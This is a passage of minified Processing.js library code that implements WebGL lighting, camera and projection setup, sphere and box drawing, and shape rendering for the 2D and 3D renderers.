DRAW);bc=d4.createBuffer();b7=d4.createBuffer();ar=d4.createBuffer();aE=d4.createBuffer();bz=d4.createBuffer();ae=d4.createBuffer();av=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,av);d4.bufferData(d4.ARRAY_BUFFER,new e([0,0,0]),d4.STATIC_DRAW);cG=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,cG);d4.bufferData(d4.ARRAY_BUFFER,new e([1,1,0,-1,1,0,-1,-1,0,1,-1,0]),d4.STATIC_DRAW);aa=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,aa);d4.bufferData(d4.ARRAY_BUFFER,new e([0,0,1,0,1,1,0,1]),d4.STATIC_DRAW);P=d4.createBuffer();d4.bindBuffer(d4.ELEMENT_ARRAY_BUFFER,P);d4.bufferData(d4.ELEMENT_ARRAY_BUFFER,new w([0,1,2,2,3,0]),d4.STATIC_DRAW);bT=new aM;cg=new aM;dF=new aM;aQ=new aM;da=new aM;cV.camera();cV.perspective();al=new T;c9=new T;c2=new aM;aN=new aM;aJ=new aM;bw=new aM;cc=new aM;S=new aM;S.set(-1,3,-3,1,3,-6,3,0,-3,3,0,0,1,0,0,0);dp.prototype.size.apply(this,arguments)}}();bO.prototype.ambientLight=dp.prototype.a3DOnlyFunction;by.prototype.ambientLight=function(d7,ea,ef,eg,ec,eb){if(dH===8){throw"can only create "+8+" lights"}var ed=new y(eg,ec,eb);var ee=new aM;ee.scale(1,-1,1);ee.apply(dF.array());ee.mult(ed,ed);var d8=dD(d7,ea,ef,0);var d9=[((d8>>16)&255)/255,((d8&65280)>>>8)/255,(d8&255)/255];d4.useProgram(du);dY("lights.color.3d."+dH,du,"lights"+dH+".color",d9);dY("lights.position.3d."+dH,du,"lights"+dH+".position",ed.array());dV("lights.type.3d."+dH,du,"lights"+dH+".type",0);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.directionalLight=dp.prototype.a3DOnlyFunction;by.prototype.directionalLight=function(d7,ed,ef,ee,ec,eb){if(dH===8){throw"can only create "+8+" lights"}d4.useProgram(du);var eg=new aM;eg.scale(1,-1,1);eg.apply(dF.array());eg=eg.array();var d9=[eg[0]*ee+eg[4]*ec+eg[8]*eb,eg[1]*ee+eg[5]*ec+eg[9]*eb,eg[2]*ee+eg[6]*ec+eg[10]*eb];var d8=dD(d7,ed,ef,0);var ea=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];dY("lights.color.3d."+dH,du,"lights"+dH+".color",ea);dY("lights.position.3d."+dH,du,"lights"+dH+".position",d9);dV("lights.type.3d."+dH,du,"lights"+dH+".type",1);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.lightFalloff=dp.prototype.a3DOnlyFunction;by.prototype.lightFalloff=function(d8,d7,d9){d4.useProgram(du);dY("falloff3d",du,"falloff",[d8,d7,d9])};bO.prototype.lightSpecular=dp.prototype.a3DOnlyFunction;by.prototype.lightSpecular=function(eb,ea,d7){var d8=dD(eb,ea,d7,0);var d9=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];d4.useProgram(du);dY("specular3d",du,"specular",d9)};cV.lights=function(){cV.ambientLight(128,128,128);cV.directionalLight(128,128,128,0,0,-1);cV.lightFalloff(1,0,0);cV.lightSpecular(0,0,0)};bO.prototype.pointLight=dp.prototype.a3DOnlyFunction;by.prototype.pointLight=function(d7,ea,ef,eg,ec,eb){if(dH===8){throw"can only create "+8+" lights"}var ed=new y(eg,ec,eb);var ee=new aM;ee.scale(1,-1,1);ee.apply(dF.array());ee.mult(ed,ed);var d8=dD(d7,ea,ef,0);var d9=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];d4.useProgram(du);dY("lights.color.3d."+dH,du,"lights"+dH+".color",d9);dY("lights.position.3d."+dH,du,"lights"+dH+".position",ed.array());dV("lights.type.3d."+dH,du,"lights"+dH+".type",2);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.noLights=dp.prototype.a3DOnlyFunction;by.prototype.noLights=function(){dH=0;d4.useProgram(du);dV("lightCount3d",du,"lightCount",dH)};bO.prototype.spotLight=dp.prototype.a3DOnlyFunction;by.prototype.spotLight=function(d7,ef,ek,el,ej,eh,eg,ee,ec,eb,ed){if(dH===8){throw"can only create "+8+" lights"}d4.useProgram(du);var ei=new y(el,ej,eh);var em=new aM;em.scale(1,-1,1);em.apply(dF.array());em.mult(ei,ei);em=em.array();var d9=[em[0]*eg+em[4]*ee+em[8]*ec,em[1]*eg+em[5]*ee+em[9]*ec,em[2]*eg+em[6]*ee+em[10]*ec];var d8=dD(d7,ef,ek,0);var ea=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];dY("lights.color.3d."+dH,du,"lights"+dH+".color",ea);dY("lights.position.3d."+dH,du,"lights"+dH+".position",ei.array());dY("lights.direction.3d."+dH,du,"lights"+dH+".direction",d9);dY("lights.concentration.3d."+dH,du,"lights"+dH+".concentration",ed);dY("lights.angle.3d."+dH,du,"lights"+dH+".angle",eb);dV("lights.type.3d."+dH,du,"lights"+dH+".type",3);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.beginCamera=function(){throw"beginCamera() is not available in 2D mode"};by.prototype.beginCamera=function(){if(ao){throw"You cannot call beginCamera() again before calling endCamera()"}ao=true;dF=cg;aQ=bT};bO.prototype.endCamera=function(){throw"endCamera() is not available in 2D mode"};by.prototype.endCamera=function(){if(!ao){throw"You cannot call endCamera() before calling beginCamera()"}dF.set(bT);aQ.set(cg);ao=false};cV.camera=function(ei,eh,ef,ed,eb,ea,eq,eo,em){if(ei===r){dj=cV.width/2;dh=cV.height/2;dg=dh/o.tan(cJ/2);ei=dj;eh=dh;ef=dg;ed=dj;eb=dh;ea=0;eq=0;eo=1;em=0}var ec=new y(ei-ed,eh-eb,ef-ea);var ee=new y(eq,eo,em);ec.normalize();var eg=y.cross(ee,ec);ee=y.cross(ec,eg);eg.normalize();ee.normalize();var er=eg.x,ep=eg.y,en=eg.z;var d9=ee.x,d8=ee.y,d7=ee.z;var el=ec.x,ek=ec.y,ej=ec.z;bT.set(er,ep,en,0,d9,d8,d7,0,el,ek,ej,0,0,0,0,1);bT.translate(-ei,-eh,-ef);cg.reset();cg.invApply(er,ep,en,0,d9,d8,d7,0,el,ek,ej,0,0,0,0,1);cg.translate(ei,eh,ef);dF.set(bT);aQ.set(cg)};cV.perspective=function(eb,d9,ec,d8){if(arguments.length===0){dh=ac.height/2;dg=dh/o.tan(cJ/2);aW=dg/10;au=dg*10;b4=cV.width/cV.height;eb=cJ;d9=b4;ec=aW;d8=au}var ed,d7,ee,ea;ed=ec*o.tan(eb/2);d7=-ed;ee=ed*d9;ea=d7*d9;cV.frustum(ea,ee,d7,ed,ec,d8)};bO.prototype.frustum=function(){throw"Processing.js: frustum() is not supported in 2D mode"};by.prototype.frustum=function(ed,d9,d8,ec,eb,d7){ch=true;da=new aM;da.set(2*eb/(d9-ed),0,(d9+ed)/(d9-ed),0,0,2*eb/(ec-d8),(ec+d8)/(ec-d8),0,0,0,-(d7+eb)/(d7-eb),-(2*d7*eb)/(d7-eb),0,0,-1,0);var ea=new aM;ea.set(da);ea.transpose();d4.useProgram(dM);a5("projection2d",dM,"projection",false,ea.array());d4.useProgram(du);a5("projection3d",du,"projection",false,ea.array());d4.useProgram(bQ);a5("uProjectionUS",bQ,"uProjection",false,ea.array())};cV.ortho=function(d8,ej,d7,eh,ee,ed){if(arguments.length===0){d8=0;ej=cV.width;d7=0;eh=cV.height;ee=-10;ed=10}var ei=2/(ej-d8);var eg=2/(eh-d7);var ef=-2/(ed-ee);var ec=-(ej+d8)/(ej-d8);var eb=-(eh+d7)/(eh-d7);var ea=-(ed+ee)/(ed-ee);da=new aM;da.set(ei,0,0,ec,0,eg,0,eb,0,0,ef,ea,0,0,0,1);var d9=new aM;d9.set(da);d9.transpose();d4.useProgram(dM);a5("projection2d",dM,"projection",false,d9.array());d4.useProgram(du);a5("projection3d",du,"projection",false,d9.array());d4.useProgram(bQ);a5("uProjectionUS",bQ,"uProjection",false,d9.array());ch=false};cV.printProjection=function(){da.print()};cV.printCamera=function(){bT.print()};bO.prototype.box=dp.prototype.a3DOnlyFunction;by.prototype.box=function(d9,ec,ee){if(!ec||!ee){ec=ee=d9}var eb=new aM;eb.scale(d9,ec,ee);var d8=new aM;d8.scale(1,-1,1);d8.apply(dF.array());d8.transpose();if(aF){d4.useProgram(du);a5("model3d",du,"model",false,eb.array());a5("view3d",du,"view",false,d8.array());d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",bl);if(dH>0){var ea=new aM;ea.set(d8);var d7=new aM;d7.set(eb);ea.mult(d7);var ed=new aM;ed.set(ea);ed.invert();ed.transpose();a5("normalTransform3d",du,"normalTransform",false,ed.array());db("normal3d",du,"Normal",3,cI)}else{cf("normal3d",du,"Normal")}db("vertex3d",du,"Vertex",3,bd);cf("aColor3d",du,"aColor");cf("aTexture3d",du,"aTexture");d4.drawArrays(d4.TRIANGLES,0,df.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)}if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,eb.array());a5("view2d",dM,"view",false,d8.array());dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,di);cf("aTextureCoord2d",dM,"aTextureCoord");d4.drawArrays(d4.LINES,0,bE.length/3)}};var cC=function(){var d8;cE=[];for(d8=0;d8<bK;d8++){cE.push(0);cE.push(-1);cE.push(0);cE.push(bq[d8]);cE.push(bp[d8]);cE.push(bo[d8])}cE.push(0);cE.push(-1);cE.push(0);cE.push(bq[0]);cE.push(bp[0]);cE.push(bo[0]);var ec,d9,eb;var ea=0;for(d8=2;d8<bJ;d8++){ec=d9=ea;ea+=bK;eb=ea;for(var d7=0;d7<bK;d7++){cE.push(bq[ec]);cE.push(bp[ec]);cE.push(bo[ec++]);cE.push(bq[eb]);cE.push(bp[eb]);cE.push(bo[eb++])}ec=d9;eb=ea;cE.push(bq[ec]);cE.push(bp[ec]);cE.push(bo[ec]);cE.push(bq[eb]);cE.push(bp[eb]);cE.push(bo[eb])}for(d8=0;d8<bK;d8++){eb=ea+d8;cE.push(bq[eb]);cE.push(bp[eb]);cE.push(bo[eb]);cE.push(0);cE.push(1);cE.push(0)}cE.push(bq[ea]);cE.push(bp[ea]);cE.push(bo[ea]);cE.push(0);cE.push(1);cE.push(0);d4.bindBuffer(d4.ARRAY_BUFFER,bc);d4.bufferData(d4.ARRAY_BUFFER,new e(cE),d4.STATIC_DRAW)};cV.sphereDetail=function(d8,ej){var ee;if(arguments.length===1){d8=ej=arguments[0]}if(d8<3){d8=3}if(ej<2){ej=2}if(d8===bK&&ej===bJ){return}var ei=720/d8;var ec=new e(d8);var d9=new e(d8);for(ee=0;ee<d8;ee++){ec[ee]=bi[ee*ei%720|0];d9[ee]=ag[ee*ei%720|0]}var eh=d8*(ej-1)+2;var eg=0;bq=new e(eh);bp=new e(eh);bo=new e(eh);var ef=720*0.5/ej;var eb=ef;for(ee=1;ee<ej;ee++){var ea=ag[eb%720|0];var d7=-bi[eb%720|0];for(var ed=0;ed<d8;ed++){bq[eg]=ec[ed]*ea;bp[eg]=d7;bo[eg++]=d9[ed]*ea}eb+=ef}bK=d8;bJ=ej;cC()};bO.prototype.sphere=dp.prototype.a3DOnlyFunction;by.prototype.sphere=function(){var eb=arguments[0];if(bK<3||bJ<2){cV.sphereDetail(30)}var ea=new aM;ea.scale(eb,eb,eb);var d8=new aM;d8.scale(1,-1,1);d8.apply(dF.array());d8.transpose();if(aF){if(dH>0){var d9=new aM;d9.set(d8);var d7=new aM;d7.set(ea);d9.mult(d7);var ec=new aM;ec.set(d9);ec.invert();ec.transpose();a5("normalTransform3d",du,"normalTransform",false,ec.array());db("normal3d",du,"Normal",3,bc)}else{cf("normal3d",du,"Normal")}d4.useProgram(du);cf("aTexture3d",du,"aTexture");a5("model3d",du,"model",false,ea.array());a5("view3d",du,"view",false,d8.array());db("vertex3d",du,"Vertex",3,bc);cf("aColor3d",du,"aColor");d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",bl);d4.drawArrays(d4.TRIANGLE_STRIP,0,cE.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)}if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,ea.array());a5("view2d",dM,"view",false,d8.array());db("vertex2d",dM,"Vertex",3,bc);cf("aTextureCoord2d",dM,"aTextureCoord");dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);d4.drawArrays(d4.LINE_STRIP,0,cE.length/3)}};cV.modelX=function(ed,ec,eb){var ef=dF.array();var eh=cg.array();var d7=ef[0]*ed+ef[1]*ec+ef[2]*eb+ef[3];var eg=ef[4]*ed+ef[5]*ec+ef[6]*eb+ef[7];var ee=ef[8]*ed+ef[9]*ec+ef[10]*eb+ef[11];var d8=ef[12]*ed+ef[13]*ec+ef[14]*eb+ef[15];var d9=eh[0]*d7+eh[1]*eg+eh[2]*ee+eh[3]*d8;var ea=eh[12]*d7+eh[13]*eg+eh[14]*ee+eh[15]*d8;return ea!==0?d9/ea:d9};cV.modelY=function(ed,ec,eb){var ef=dF.array();var eh=cg.array();var d7=ef[0]*ed+ef[1]*ec+ef[2]*eb+ef[3];var eg=ef[4]*ed+ef[5]*ec+ef[6]*eb+ef[7];var ee=ef[8]*ed+ef[9]*ec+ef[10]*eb+ef[11];var d8=ef[12]*ed+ef[13]*ec+ef[14]*eb+ef[15];var d9=eh[4]*d7+eh[5]*eg+eh[6]*ee+eh[7]*d8;var ea=eh[12]*d7+eh[13]*eg+eh[14]*ee+eh[15]*d8;return ea!==0?d9/ea:d9};cV.modelZ=function(ed,ec,eb){var ef=dF.array();var eh=cg.array();var d7=ef[0]*ed+ef[1]*ec+ef[2]*eb+ef[3];var eg=ef[4]*ed+ef[5]*ec+ef[6]*eb+ef[7];var ee=ef[8]*ed+ef[9]*ec+ef[10]*eb+ef[11];var d9=ef[12]*ed+ef[13]*ec+ef[14]*eb+ef[15];var d8=eh[8]*d7+eh[9]*eg+eh[10]*ee+eh[11]*d9;var ea=eh[12]*d7+eh[13]*eg+eh[14]*ee+eh[15]*d9;return ea!==0?d8/ea:d8};bO.prototype.ambient=dp.prototype.a3DOnlyFunction;by.prototype.ambient=function(ea,d9,d8){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);var d7=cV.color(ea,d9,d8);dY("mat_ambient3d",du,"mat_ambient",cV.color.toGLArray(d7).slice(0,3))};bO.prototype.emissive=dp.prototype.a3DOnlyFunction;by.prototype.emissive=function(ea,d9,d8){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);var d7=cV.color(ea,d9,d8);dY("mat_emissive3d",du,"mat_emissive",cV.color.toGLArray(d7).slice(0,3))};bO.prototype.shininess=dp.prototype.a3DOnlyFunction;by.prototype.shininess=function(d7){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);dY("shininess3d",du,"shininess",d7)};bO.prototype.specular=dp.prototype.a3DOnlyFunction;by.prototype.specular=function(ea,d9,d8){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);var d7=cV.color(ea,d9,d8);dY("mat_specular3d",du,"mat_specular",cV.color.toGLArray(d7).slice(0,3))};cV.screenX=function(ee,ed,ec){var eg=dF.array();if(eg.length===16){var d7=eg[0]*ee+eg[1]*ed+eg[2]*ec+eg[3];var eh=eg[4]*ee+eg[5]*ed+eg[6]*ec+eg[7];var ef=eg[8]*ee+eg[9]*ed+eg[10]*ec+eg[11];var d8=eg[12]*ee+eg[13]*ed+eg[14]*ec+eg[15];var eb=da.array();var d9=eb[0]*d7+eb[1]*eh+eb[2]*ef+eb[3]*d8;var ea=eb[12]*d7+eb[13]*eh+eb[14]*ef+eb[15]*d8;if(ea!==0){d9/=ea}return cV.width*(1+d9)/2}return dF.multX(ee,ed)};cV.screenY=function az(ee,ed,ec){var eg=dF.array();if(eg.length===16){var d7=eg[0]*ee+eg[1]*ed+eg[2]*ec+eg[3];var eh=eg[4]*ee+eg[5]*ed+eg[6]*ec+eg[7];var ef=eg[8]*ee+eg[9]*ed+eg[10]*ec+eg[11];var d8=eg[12]*ee+eg[13]*ed+eg[14]*ec+eg[15];var eb=da.array();var d9=eb[4]*d7+eb[5]*eh+eb[6]*ef+eb[7]*d8;var ea=eb[12]*d7+eb[13]*eh+eb[14]*ef+eb[15]*d8;if(ea!==0){d9/=ea}return cV.height*(1+d9)/2}return dF.multY(ee,ed)};cV.screenZ=function ax(ee,ed,ec){var eg=dF.array();if(eg.length!==16){return 0}var eb=da.array();var d7=eg[0]*ee+eg[1]*ed+eg[2]*ec+eg[3];var eh=eg[4]*ee+eg[5]*ed+eg[6]*ec+eg[7];var ef=eg[8]*ee+eg[9]*ed+eg[10]*ec+eg[11];var d9=eg[12]*ee+eg[13]*ed+eg[14]*ec+eg[15];var d8=eb[8]*d7+eb[9]*eh+eb[10]*ef+eb[11]*d9;var ea=eb[12]*d7+eb[13]*eh+eb[14]*ef+eb[15]*d9;if(ea!==0){d8/=ea}return(d8+1)/2};dp.prototype.fill=function(){var d7=cV.color(arguments[0],arguments[1],arguments[2],arguments[3]);if(d7===aX&&aF){return}aF=true;aX=d7};bO.prototype.fill=function(){dp.prototype.fill.apply(this,arguments);ap=true};by.prototype.fill=function(){dp.prototype.fill.apply(this,arguments);bl=cV.color.toGLArray(aX)};function bk(){if(aF){if(ap){d4.fillStyle=cV.color.toString(aX);ap=false}d4.fill()}}cV.noFill=function(){aF=false};dp.prototype.stroke=function(){var d7=cV.color(arguments[0],arguments[1],arguments[2],arguments[3]);if(d7===cu&&cd){return}cd=true;cu=d7};bO.prototype.stroke=function(){dp.prototype.stroke.apply(this,arguments);b2=true};by.prototype.stroke=function(){dp.prototype.stroke.apply(this,arguments);cZ=cV.color.toGLArray(cu)};function dc(){if(cd){if(b2){d4.strokeStyle=cV.color.toString(cu);b2=false}d4.stroke()}}cV.noStroke=function(){cd=false};dp.prototype.strokeWeight=function(d7){dS=d7};bO.prototype.strokeWeight=function(d7){dp.prototype.strokeWeight.apply(this,arguments);d4.lineWidth=d7};by.prototype.strokeWeight=function(d7){dp.prototype.strokeWeight.apply(this,arguments);d4.useProgram(dM);dY("pointSize2d",dM,"pointSize",d7);d4.useProgram(bQ);dY("pointSizeUnlitShape",bQ,"pointSize",d7);d4.lineWidth(d7)};cV.strokeCap=function(d7){dU.$ensureContext().lineCap=d7};cV.strokeJoin=function(d7){dU.$ensureContext().lineJoin=d7};bO.prototype.smooth=function(){dK=true;var d7=ac.style;d7.setProperty("image-rendering","optimizeQuality","important");d7.setProperty("-ms-interpolation-mode","bicubic","important");if(d4.hasOwnProperty("mozImageSmoothingEnabled")){d4.mozImageSmoothingEnabled=true}};by.prototype.smooth=E;bO.prototype.noSmooth=function(){dK=false;var d7=ac.style;d7.setProperty("image-rendering","optimizeSpeed","important");d7.setProperty("image-rendering","-moz-crisp-edges","important");d7.setProperty("image-rendering","-webkit-optimize-contrast","important");d7.setProperty("image-rendering","optimize-contrast","important");d7.setProperty("-ms-interpolation-mode","nearest-neighbor","important");if(d4.hasOwnProperty("mozImageSmoothingEnabled")){d4.mozImageSmoothingEnabled=false}};by.prototype.noSmooth=E;bO.prototype.point=function(d7,d8){if(!cd){return}d7=o.round(d7);d8=o.round(d8);d4.fillStyle=cV.color.toString(cu);ap=true;if(dS>1){d4.beginPath();d4.arc(d7,d8,dS/2,0,6.283185307179586,false);d4.fill()}else{d4.fillRect(d7,d8,1,1)}};by.prototype.point=function(d7,eb,ea){var d9=new aM;d9.translate(d7,eb,ea||0);d9.transpose();var d8=new aM;d8.scale(1,-1,1);d8.apply(dF.array());d8.transpose();d4.useProgram(dM);a5("model2d",dM,"model",false,d9.array());a5("view2d",dM,"view",false,d8.array());if(dS>0&&cd){dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,av);cf("aTextureCoord2d",dM,"aTextureCoord");d4.drawArrays(d4.POINTS,0,1)}};cV.beginShape=function(d7){dN=d7;d2=[];a7=[]};bO.prototype.vertex=function(d7,eb,ea,d9){var d8=[];if(dr){dr=false}d8.isVert=true;d8[0]=d7;d8[1]=eb;d8[2]=0;d8[3]=ea;d8[4]=d9;d8[5]=aX;d8[6]=cu;a7.push(d8)};by.prototype.vertex=function(d7,ec,eb,ea,d9){var d8=[];if(dr){dr=false}d8.isVert=true;if(d9===r&&dP){d9=ea;ea=eb;eb=0}if(ea!==r&&d9!==r){if(d0===2){ea/=cr.width;d9/=cr.height}ea=ea>1?1:ea;ea=ea<0?0:ea;d9=d9>1?1:d9;d9=d9<0?0:d9}d8[0]=d7;d8[1]=ec;d8[2]=eb||0;d8[3]=ea||0;d8[4]=d9||0;d8[5]=bl[0];d8[6]=bl[1];d8[7]=bl[2];d8[8]=bl[3];d8[9]=cZ[0];d8[10]=cZ[1];d8[11]=cZ[2];d8[12]=cZ[3];d8[13]=a4;d8[14]=a3;d8[15]=a2;a7.push(d8)};var dX=function(d9,d8){var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();d4.useProgram(bQ);a5("uViewUS",bQ,"uView",false,d7.array());db("aVertexUS",bQ,"aVertex",3,av);d4.bufferData(d4.ARRAY_BUFFER,new e(d9),d4.STREAM_DRAW);db("aColorUS",bQ,"aColor",4,aE);d4.bufferData(d4.ARRAY_BUFFER,new e(d8),d4.STREAM_DRAW);d4.drawArrays(d4.POINTS,0,d9.length/3)};var bg=function(eb,ea,d9){var d8;if(ea==="LINES"){d8=d4.LINES}else{if(ea==="LINE_LOOP"){d8=d4.LINE_LOOP}else{d8=d4.LINE_STRIP}}var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();d4.useProgram(bQ);a5("uViewUS",bQ,"uView",false,d7.array());db("aVertexUS",bQ,"aVertex",3,b7);d4.bufferData(d4.ARRAY_BUFFER,new e(eb),d4.STREAM_DRAW);db("aColorUS",bQ,"aColor",4,bz);d4.bufferData(d4.ARRAY_BUFFER,new e(d9),d4.STREAM_DRAW);d4.drawArrays(d8,0,eb.length/3)};var dk=function(ec,eb,ea,d9){var d8;if(eb==="TRIANGLES"){d8=d4.TRIANGLES}else{if(eb==="TRIANGLE_FAN"){d8=d4.TRIANGLE_FAN}else{d8=d4.TRIANGLE_STRIP}}var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();d4.useProgram(du);a5("model3d",du,"model",false,[1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1]);a5("view3d",du,"view",false,d7.array());d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",[-1,0,0,0]);db("vertex3d",du,"Vertex",3,ar);d4.bufferData(d4.ARRAY_BUFFER,new e(ec),d4.STREAM_DRAW);if(dP&&bb!==null){bt(ea)}db("aColor3d",du,"aColor",4,aE);d4.bufferData(d4.ARRAY_BUFFER,new e(ea),d4.STREAM_DRAW);cf("normal3d",du,"Normal");if(dP){dV("usingTexture3d",du,"usingTexture",dP);db("aTexture3d",du,"aTexture",2,ae);d4.bufferData(d4.ARRAY_BUFFER,new e(d9),d4.STREAM_DRAW)}d4.drawArrays(d8,0,ec.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)};function cR(){bk();dc();d4.closePath()}bO.prototype.endShape=function(ee){if(a7.length===0){return}var ea=ee===2;if(ea){a7.push(a7[0])}var d9=[];var d7=[];var eg=[];var ej=[];var ec=[];var ef;dr=true;var ed,eb,d8;var ei=a7.length;for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d7.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=5;eb<9;eb++){eg.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];ec.push(ef[3]);ec.push(ef[4])}if(dL&&(dN===20||dN===r)){if(ei>3){var eh=[],ek=1-aH;d4.beginPath();d4.moveTo(a7[1][0],a7[1][1]);for(ed=1;ed+2<ei;ed++){ef=a7[ed];eh[0]=[ef[0],ef[1]];eh[1]=[ef[0]+(ek*a7[ed+1][0]-ek*a7[ed-1][0])/6,ef[1]+(ek*a7[ed+1][1]-ek*a7[ed-1][1])/6];eh[2]=[a7[ed+1][0]+(ek*a7[ed][0]-ek*a7[ed+2][0])/6,a7[ed+1][1]+(ek*a7[ed][1]-ek*a7[ed+2][1])/6];eh[3]=[a7[ed+1][0],a7[ed+1][1]];d4.bezierCurveTo(eh[1][0],eh[1][1],eh[2][0],eh[2][1],eh[3][0],eh[3][1])}cR()}}else{if(Y&&(dN===20||dN===r)){d4.beginPath();for(ed=0;ed<ei;ed++){ef=a7[ed];if(a7[ed]["isVert"]){if(a7[ed]["moveTo"]){d4.moveTo(ef[0],ef[1])}else{d4.lineTo(ef[0],ef[1])}}else{d4.bezierCurveTo(a7[ed][0],a7[ed][1],a7[ed][2],a7[ed][3],a7[ed][4],a7[ed][5])}}cR()}else{if(dN===2){for(ed=0;ed<ei;ed++){ef=a7[ed];if(cd){cV.stroke(ef[6])}cV.point(ef[0],ef[1])}}else{if(dN===4){for(ed=0;ed+1<ei;ed+=2){ef=a7[ed];if(cd){cV.stroke(a7[ed+1][6])}cV.line(ef[0],ef[1],a7[ed+1][0],a7[ed+1][1])}}else{if(dN===9){for(ed=0;ed+2<ei;ed+=3){ef=a7[ed];d4.beginPath();d4.moveTo(ef[0],ef[1]);d4.lineTo(a7[ed+1][0],a7[ed+1][1]);d4.lineTo(a7[ed+2][0],a7[ed+2][1]);d4.lineTo(ef[0],ef[1]);if(aF){cV.fill(a7[ed+2][5]);bk()}if(cd){cV.stroke(a7[ed+2][6]);dc()}d4.closePath()}}else{if(dN===10){for(ed=0;ed+1<ei;ed++){ef=a7[ed];d4.beginPath();d4.moveTo(a7[ed+1][0],a7[ed+1][1]);d4.lineTo(ef[0],ef[1]);if(cd){cV.stroke(a7[ed+1][6])}if(aF){cV.fill(a7[ed+1][5])}if(ed+2<ei){d4.lineTo(a7[ed+2][0],a7[ed+2][1]);if(cd){cV.stroke(a7[ed+2][6])}if(aF){cV.fill(a7[ed+2][5])}}cR()}}else{if(dN===11){if(ei>2){d4.beginPath();d4.moveTo(a7[0][0],a7[0][1]);d4.lineTo(a7[1][0],a7[1][1]);d4.lineTo(a7[2][0],a7[2][1]);if(aF){cV.fill(a7[2][5]);bk()}if(cd){cV.stroke(a7[2][6]);dc()}d4.closePath();for(ed=3;ed<ei;ed++){ef=a7[ed];d4.beginPath();d4.moveTo(a7[0][0],a7[0][1]);d4.lineTo(a7[ed-1][0],a7[ed-1][1]);d4.lineTo(ef[0],ef[1]);if(aF){cV.fill(ef[5]);bk()}if(cd){cV.stroke(ef[6]);dc()}d4.closePath()}}}else{if(dN===16){for(ed=0;ed+3<ei;ed+=4){ef=a7[ed];d4.beginPath();d4.moveTo(ef[0],ef[1]);for(eb=1;eb<4;eb++){d4.lineTo(a7[ed+eb][0],a7[ed+eb][1])}d4.lineTo(ef[0],ef[1]);if(aF){cV.fill(a7[ed+3][5]);bk()}if(cd){cV.stroke(a7[ed+3][6]);dc()}d4.closePath()}}else{if(dN===17){if(ei>3){for(ed=0;ed+1<ei;ed+=2){ef=a7[ed];d4.beginPath();if(ed+3<ei){d4.moveTo(a7[ed+2][0],a7[ed+2][1]);d4.lineTo(ef[0],ef[1]);d4.lineTo(a7[ed+1][0],a7[ed+1][1]);d4.lineTo(a7[ed+3][0],a7[ed+3][1]);if(aF){cV.fill(a7[ed+3][5])}if(cd){cV.stroke(a7[ed+3][6])}}else{d4.moveTo(ef[0],ef[1]);d4.lineTo(a7[ed+1][0],a7[ed+1][1])}cR()}}}else{d4.beginPath();d4.moveTo(a7[0][0],a7[0][1]);for(ed=1;ed<ei;ed++){ef=a7[ed];if(ef.isVert){if(ef.moveTo){d4.moveTo(ef[0],ef[1])}else{d4.lineTo(ef[0],ef[1])}}}cR()}}}}}}}}}dL=false;Y=false;ca=[];c1=0;if(ea){a7.pop()}};by.prototype.endShape=function(ee){if(a7.length===0){return}var ea=ee===2;var d9=[];var d7=[];var eg=[];var ej=[];var ec=[];var ef;dr=true;var ed,eb,d8;var ei=a7.length;for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d7.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=5;eb<9;eb++){eg.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];ec.push(ef[3]);ec.push(ef[4])}if(ea){d7.push(a7[0][0]);d7.push(a7[0][1]);d7.push(a7[0][2]);for(ed=5;ed<9;ed++){eg.push(a7[0][ed])}for(ed=9;ed<13;ed++){ej.push(a7[0][ed])}ec.push(a7[0][3]);ec.push(a7[0][4])}if(dL&&(dN===20||dN===r)){d9=d7;if(cd){bg(d9,null,ej)}if(aF){dk(d7,null,eg)}}else{if(Y&&(dN===20||dN===r)){d9=d7;d9.splice(d9.length-3);ej.splice(ej.length-4);if(cd){bg(d9,null,ej)}if(aF){dk(d7,"TRIANGLES",eg)}}else{if(dN===2){for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}}dX(d9,ej)}else{if(dN===4){for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<